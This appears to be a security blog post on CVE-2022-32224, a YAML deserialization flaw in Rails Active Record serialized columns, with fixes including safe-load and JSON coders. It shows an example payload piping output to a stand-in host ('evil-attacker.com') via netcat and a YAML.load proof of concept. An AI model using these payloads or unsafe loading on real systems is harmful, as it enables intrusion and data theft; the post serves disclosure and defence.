
If you use Ruby on Rails and Active Record with serialized YAML columns, this post is a must-read. A critical vulnerability—CVE-2022-32224—can let an attacker escalate from a simple data write (think SQL injection) all the way to running commands on your server. Read on for plain-language details, examples, and how to protect your app.

What is CVE-2022-32224?

Rails developers often use Active Record's serialize to store hashes or arrays in a database column. For example, you might have a column called settings that stores a YAML-encoded Ruby hash.

Fixed in Rails 5.2.8.1 (and in the corresponding patch releases of the newer branches).

If an attacker can insert arbitrary data into the serialized column—commonly via SQL injection—Rails will deserialize *any* YAML, including objects that can trigger code execution (RCE) in Ruby.

Why is this Critical?

Active Record's serialize loads the column contents with YAML. If that data is not trusted, YAML can deserialize dangerous Ruby objects, and an attacker can craft those objects to run system commands on your server.

- Apps using serialize without restrictions (default is YAML)

- Apps with any way for attackers to directly write to the database serialized columns (SQL injection, malicious admin, etc.)

Let's look at a simple Ruby model:

class User < ApplicationRecord
  # settings is a text column
  serialize :settings
end

Suppose there's a SQL injection or other bug that lets a hacker set User#settings to any string. The attacker puts in a payload like:

--- !ruby/object:Gem::Installer
i: x
gem:
  post_install_message: "ls /tmp | nc evil-attacker.com 4444"

When Rails loads this record, it will deserialize the YAML payload. Some Ruby classes have “dangerous” behaviors in their initialization (see references about YAML Unsafe Load). If any of these can be exploited (think: arbitrary code execution via command execution), the attacker gets RCE.

Proof of Concept Exploit

Let's show a minimal local simulation. (Don't run this in production!)

require 'yaml'

malicious = <<-PAYLOAD
--- !ruby/object:Gem::Installer
i: x
gem:
  post_install_message: "id > /tmp/hacked"
PAYLOAD

obj = YAML.load(malicious)

Warning: This *will* run code if the class targeted has dangerous methods in its deserialization path.

How to Fix CVE-2022-32224

1. Upgrade Rails/ActiveRecord

See the official advisory:

https://github.com/advisories/GHSA-65cv-r6x7-79hv
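Beyond upgrading, the summary below suggests switching the column away from unrestricted YAML. The following is an added example, not code from the original post or from Rails: two hypothetical replacement coders for a `serialize :settings` column, one that loads YAML with no permitted classes and one that uses JSON, plus a check that a constructed `!ruby/object` payload is refused instead of instantiated.

```ruby
require 'yaml'
require 'json'

# Constructed payload with a Ruby object tag. It names no gadget; it only
# shows that a tagged object is refused by a restricted coder.
TAGGED_PAYLOAD = "--- !ruby/object:OpenStruct\ntable:\n  :x: 1\n".freeze
PLAIN_SETTINGS = { "theme" => "dark", "retries" => 3 }.freeze

# Hypothetical coder for the settings column: only plain YAML scalars,
# arrays and hashes may come back. Any !ruby/... tag raises
# Psych::DisallowedClass instead of building an object.
module SafeSettingsCoder
  def self.dump(obj)
    YAML.dump(obj)
  end

  def self.load(str)
    return {} if str.nil? || str.strip.empty?
    YAML.safe_load(str, permitted_classes: [], aliases: false) || {}
  end
end

# JSON alternative: the format has no object tags, so there is nothing to
# instantiate. Rows already stored as YAML must be migrated first.
module JsonSettingsCoder
  def self.dump(obj)
    JSON.generate(obj)
  end

  def self.load(str)
    return {} if str.nil? || str.strip.empty?
    JSON.parse(str)
  end
end

# True when the coder refuses the raw column value rather than loading it.
def rejects_tagged_object?(coder, raw)
  coder.load(raw)
  false
rescue Psych::DisallowedClass, JSON::ParserError
  true
end

# Hypothetical wiring in the model (Rails 7.0 positional form; 7.1 also
# accepts the coder: keyword):
#   serialize :settings, SafeSettingsCoder   # or JsonSettingsCoder
```

Existing rows whose YAML holds Symbol keys will be refused by SafeSettingsCoder; the patched Rails releases expose `config.active_record.yaml_column_permitted_classes` (default `[Symbol]`) for that case.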

More References

- Rails Security Advisory - Possible escalation to RCE using YAML columns in Active Record
- OWASP: YAML Deserialization
- GitHub security advisory
- NVD entry CVE-2022-32224

Summary

If you use YAML-serialized columns in Active Record—and especially if your app is vulnerable to SQL injection or raw database input—you could be one deserialization away from a server compromise. Patch your Rails! Switch to JSON serialization. And review how you use serialize in your models.

Timeline

Published on: 12/05/2022 22:15:00 UTC
Last modified on: 12/08/2022 13:20:00 UTC